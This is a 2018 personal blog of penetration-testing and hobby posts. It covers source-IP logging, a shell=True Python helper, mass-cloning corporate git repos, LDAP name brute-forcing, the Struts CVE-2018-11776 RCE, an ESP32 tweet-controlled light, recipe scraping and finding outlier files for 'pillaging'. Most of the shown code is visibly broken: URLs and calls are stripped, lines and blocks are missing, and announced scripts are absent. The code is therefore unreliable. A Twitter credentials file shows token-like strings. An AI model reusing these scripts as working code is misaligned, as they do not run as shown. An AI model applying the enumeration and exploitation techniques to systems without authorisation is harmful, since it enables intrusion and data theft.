Wednesday, November 28, 2018

Keep Track Of Your Source IP

Pentesters/RedTeamers often need to track their outgoing IPs for Blue Teams to be able to correlate activity and know if an attack is shceduled activity or something else.

Below is a script that will reach out, grab your public IP, and if it's different from the last entry, enter it into a log file. I use crontab to execute it at the top of every minute.
# This script records changes to your external IP to a log file with timestamp
# Install:
# crontab -e
# * * * * * /Users/MYUSERNAME/WHEREVER/
# And then change the iplogfileloc below to where you want the logfile to save.

# You should have an iplog.txt with contents like this:
# $ cat iplog.txt
# Wed Nov 28 12:56:40 MST 2018 --
# Wed Nov 28 13:00:07 MST 2018 --

# Change the below location to what you want

myip=$(curl 2> /dev/null| grep origin | awk '{print $2}' | tr -d '"')

#create file if it doesnt exist
[ -f ${iplogfileloc} ] || touch ${iplogfileloc}

if ! cat ${iplogfileloc} | tail -1 | grep ${myip} > /dev/null ; then
    # if your IP has changed, add it to the file
    echo $(date) '--' ${myip} >> ${iplogfileloc}

Now you can change IPs via VPN or whatever and always be able to refer to it later. The only edge case is if you change IPs multiple times within one minute, but that should be rare and accounted for in sprays.

Monday, November 26, 2018

Ways to Enumerate Users

A couple of methods to identify usernames that can then be used in other areas of a pentest are below. I added as many as I could think of. I limited it to ones mostly seen from the public Internet.

Tuesday, September 18, 2018

Saner Bash Commands Inside Python

As great as Python is, sometimes the dev's make really weird decisions regarding defaults. A perfect example is running shell commands inside Python 3+. For some reason the dev thought it was a good idea to make the subprocess "run" method _not_ capture the output from stdout or stderr by default. I find this incredibly annoying and it constantly result in me having to look up the syntax since I always forget it.

I decided to instead have this little helper function to encapsulate what I consider to be saner defaults. I decode the bytes into utf8 since thats the output for 99% of all bash commands.

#!/usr/bin/env python3
import subprocess

def run_cmd(cmd):
    result =, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    result.stdout = result.stdout.decode('utf8')
    result.stderr = result.stderr.decode('utf8')
    return result

Running that function will execute whatever command you pass it (insecure, but use it appropriately) and returns an object that you can then check the return code, stdout, and stderr.

So now, it's just:

In [25]: if 'root' in run_cmd('whoami').stdout:
   ....:             print("you are root")
you are root

Thursday, August 30, 2018

Download All Corporate Git Repos

Depending on the client you are testing, they may have an internal development team that checks code into a git repo. The vast majority of the clients I've seen implement the Atlassian suite of tools, typically containing an internally hosted Bitbucket.

The Bitbucket web interface has a search feature for looking for code snippets. It's absolutely awful. It's like an off brand tonka toys reject of a search function. You know what's way better? grep. That means I'd have to download every repo to search it locally. I did that with this script:

It's handy to note that grepping isn't the only good thing about cloning repos locally. It allows you to run the myriad of vuln checker tools, load up the code into an IDE and run source/sink analysis on it, and much more.

Wednesday, August 29, 2018

Brute Force LDAP Names (or how I kinda downloaded LDAP)

Running queries over a network using the ldapsearch tool can be a bit annoying. It's especially annoying when you constantly run into the "size limit exceeded" result when you get large responses.

I decided to write a little tool to recursively and conditionally search LDAP for CN entries (basically AD account names) and download them locally. If it detects the error size limit error, it automatically adds a new character to drill even further.

It works fantastically well. After you run this tool you should have many .out files containing ldap query responses. Grep to your hearts content:

Thursday, August 23, 2018

Apache Struts 2 Vulnerability & Exploit (CVE-2018-11776)

Yesterday a new vulnerability in certain versions of Apache Struts (2.3 - 2.3.34, 2.5 - 2.5.16)was discovered that leads to RCE. It requires both vulnerable versions as well as vulnerable configurations.

The gist of the issue is that if you have a vulnerable configuration that doesn't lend a namespace to struts, struts will take the user-specified namespace instead. Fortunately, it takes the namespace and evaluates it as a OGNL expression, allowing you to fairly easily get remote code execution.

Working PoC (I personally tested it myself and it works)

Technical deep dive on finding the vulnerability:

Vuln writeup by Semmle (including conditions for vulnerable configurations)

Apache's security bulletin for the vuln:

Mitre CVE link:

A couple caveats I found while testing:
  • It definitely requires a lack of namespace attribute in the classes xml
  • All that is required for successful exploitation is a single proper GET request
  • Doesn't work on all struts-showcase installs (2.3.15 wasn't working for some reason), making me think it may be a bit finicky
I modified the PoC listed above into a simple python function, making everything simpler:

Below is it being run against a vulnerable VM I set up

Wednesday, August 15, 2018

Twitter Controlled Anything - Micropython on ESP32

I recently purchased an ESP32 from amazon for testing purposes and a colleague mentioned you could install a minimalist python environment on them for control. To say the least, I was intrigued.

I wanted to be able to control a light (or anything really) using tweets. Below are the instructions/scripts I wrote to get it working. First comes the prerequisites:
  • ESP32 (duh)
  • A VPS, Pi, or really any computer acting as a flask server (it just needs internet access)
  • A wifi network for the ESP32 to connect to, I just used the hotspot on my phone as a PoC
  • Twitter API credentials (really easy to get, just fill out the forms)
Your ESP32 will query your flask server for a trigger word to enable the LED. The Flask server will query twitter for your latest top tweet, if it has a trigger word in it, relay that to the esp32 client. Boom, tweet causes LED to turn on.

The first step is to get your ESP32 setup running the micropython environment. I followed this excellent guide

Once you get your ESP32 configured to run python code, go ahead and transfer the following script to act as the client. You just need to change the wifi details and target flask server:

import machine
import urequests
import time

pin = machine.Pin(2, machine.Pin.OUT)

def connect():
    import network
    sta_if = network.WLAN(network.STA_IF)
    if not sta_if.isconnected():
        print('connecting to network...')
        while not sta_if.isconnected():
    print('network config:', sta_if.ifconfig())

def no_debug():
    import esp
    # this can be run from the REPL as well


while True:
    if 'yes' in urequests.get('').text:

Connect the LED to Pin 2 on the ESP32 and it's all set to go. Now onto the flask server...

On your VPS/Pi/whatever, install flask and tweepy and create a directory to hold your script files. Grab the Access Token, Access Secret, Consumer Secret, Consumer Key from your Twitter Dev console that you set up earlier and place them in a "" file like the following:

ACCESS_TOKEN = '18077065-lakjsdflkajshdlfkajshdflkajsdhqqSYOtHSXtK1'
ACCESS_SECRET = 'hPqlkwjehrlkfjnlqwejhqrwklejrqhlwkejrJr1'
CONSUMER_KEY = 'QZlk9qlkwejrhqlkwjerhlqwlLh'
CONSUMER_SECRET = 'uEnkzjxcnvluqblwjbefkqwlekjflkqjwehflqlkjhuOE'

Then paste the following into ""

from twitter_creds import *

import tweepy

auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)

api = tweepy.API(auth)

def get_top_tweet():
    top_tweet = api.user_timeline(count=1)
    return top_tweet[0].text

Now create your main flask app by pasting the following into "":

from flask import Flask
from tweepy_top import get_top_tweet

app = Flask(__name__)

def hello():
    if 'light' in get_top_tweet():
        return 'yes'
        return 'no'

if __name__ == "__main__":"", threaded=True)

There you can see 'light' is used as the trigger word. Using this setup, every 2 seconds the esp32 will make a request to your flask server, which causes the flask server to query twitter for the user's top tweet, if the top tweet contains the word "light" in it, it returns the string "yes". The ESP32 recognizes the "yes" and turns on pin 2.

This is a very simple PoC and gets the job done. You can take this and expand in a thousand directions with it, some ideas:

  • A desktop counter that keeps track of your followers, retweets, likes, etc
  • A LED scroller that outputs your latest mentions
  • Or simply use twitter as the control for some device
The options are endless...enjoy :D

Thursday, August 2, 2018

Top 100 Ingredients From HomeChef Recipes

I love cooking, I consider it my primary hobby outside of infosec/coding. I had HomeChef for several months and absolutely loved it, I looked forward to each selection every week and always got to try some new techniques/flavors/combinations I probably would never had tried on my own.

Every meal they sent us had a double-sided recipe page to guide you through the process. I noticed something at the bottom of the recipe page:

They have a handy link for each recipe posted on their website, probably so it's easy to share what you made with family/friends. The fact that I saw a number, along with a list of ingredients got my thinking...

If I were to stock my pantry/fridge with "basic" ingredients, what would it look like? How about I count up the occurrences of certain ingredients on each recipe page, that should give me a good idea.

Well after gathering the data over a couple of days (I kept everything slow so as to not cause any problems) I present to you, the top 100 ingredients according to recipes on

Count Ingredient
609 Garlic Cloves
433 Butter
345 Boneless Skinless Chicken Breasts
320 Green Onions
315 Shallot
219 Lemon
210 Sour Cream
208 Lime
202 Red Onion
186 Grape Tomatoes
178 Red Bell Pepper
170 Parsley Sprigs
158 Yellow Onion
154 Mayonnaise
153 Red Pepper Flakes
152 Honey
149 Liquid Egg
148 Cremini Mushrooms
142 Russet Potatoes
142 Green Beans
138 Jasmine Rice
135 Cilantro Sprigs
134 Sugar
131 Chopped Ginger
125 Baby Arugula
122 Grated Parmesan Cheese
119 Carrot
117 Roma Tomato
114 White Cooking Wine
104 Baby Spinach
102 Grated Parmesan
101 Panko Breadcrumbs
100 Light Cream
100 Shredded Mozzarella
99 Slaw Mix
98 JalapeƱo Pepper
95 Cilantro
95 Shrimp
94 Thyme Sprigs
93 Zucchini
93 Garlic Clove
89 Parsley
88 Sriracha
87 Dijon Mustard
84 Sirloin Steaks
82 Cornstarch
76 Heavy Whipping Cream
76 Light Brown Sugar
75 Seasoned Rice Vinegar
74 Romaine Heart
73 Pork Tenderloin
72 Kale
72 Shredded Cheddar Cheese
72 Asparagus
71 Sweet Potato
71 Flour
69 Roasted Red Peppers
69 Spinach
69 Ground Beef
68 Salmon Fillets
68 Matchstick Carrots
68 Toasted Sesame Oil
62 Brussels Sprouts
62 Soy Sauce - Gluten-Free
61 Carrots
60 Mini Baguette
57 Small Flour Tortillas
57 Persian Cucumber
57 Basil Pesto
56 Green Onion
56 Ground Turkey
54 Teriyaki Glaze
54 Radishes
54 Red Fresno Chile
53 Beef Demi-Glace
52 Ear of Corn
51 Basil Sprigs
51 Roasted Chicken Breast
50 Roma Tomatoes
50 Blue Cheese
50 Canned Evaporated Whole Milk
49 Marinara Sauce
49 Extra Firm Tofu
48 Smoked Paprika
47 Balsamic Vinegar
47 Naan Flatbreads
47 Bacon Strips
47 Chicken Demi-Glace
46 Taco Seasoning
45 Avocado
45 Broccoli Florets
45 Frozen Peas
44 Chives
44 Corn Kernels
44 Plain Greek Yogurt
44 Tilapia Fillets
43 Navel Orange
43 Feta Cheese
43 Bone-in Pork Chops

What would a post be without some code? below is the embarrassing Python script (hey, it worked...) that parses the HTML:

XPATH Notes (how to grep xpath)

XPATH is a querying language for XML document trees. Lots of web scrapers use it since HTML can be represented as XML directly.

Your basic "grep" like XPATH query is something like the following:

  • //*[@itemprop="recipeIngredient"]

  • // = start at root of tree and include itself in any searches
  • * = any tag, anywhere in the document, otherwise replace with tag name
  • [blah] = evaluate the condition blah inside the brackets
  • @itemprop = This is how you reference attributes instead of tags
  • [@itemprop] = the condition is: if the itemprop attribute exists in some tag
  • [@itemprop="recipeingredient"] = condition is: if itemprop attribute's value is "recipeingredient"
Another example is if I wanted to search anything that references in an XML document, I'd search for any href attribute that contains "" like so:
  • //*[@href='']
Or limit it just to direct hyperlinks like "a" tags
  • //a[@href=']
XPATH has a lot more functionality than this but this is mostly what I need it for.

The expression in the condition brackets "[blah]" can be used with certain functions:

Wednesday, August 1, 2018

Finding Interesting Files Using Statistical Analysis

I noticed a pattern when scrounging for target data on pentests. Most of the times in which I get valuable data (test creds/log data/unencrypted logs/etc) they are often in files that are in some way different than those around them. Sometimes its their filename, like when you have 400 files named "NightlyLogDATE" and you see a "NightlyLogDATE.bak". It also tends to happen with file sizes. You'll have the same directory and almost every file is around 400-600KB and a couple will be megabytes big or only a couple KB.

These files are "interesting" to me because they differ in some way. These are the outliers. Sometimes they will be temporary backup files where a tech needed to test credit card processing with encryption turned off, or maybe some error pumped traceback/debug output to an otherwise normal file.

I decided to scrounge around online to stitch together a script that will report these outlier files.

The following script will look in the target directory, calculate the median absolute deviation, compare it against a threshold and return the filenames for you to prioritize pillaging.

It's fairly basic so I'm happy to accept any code donations :D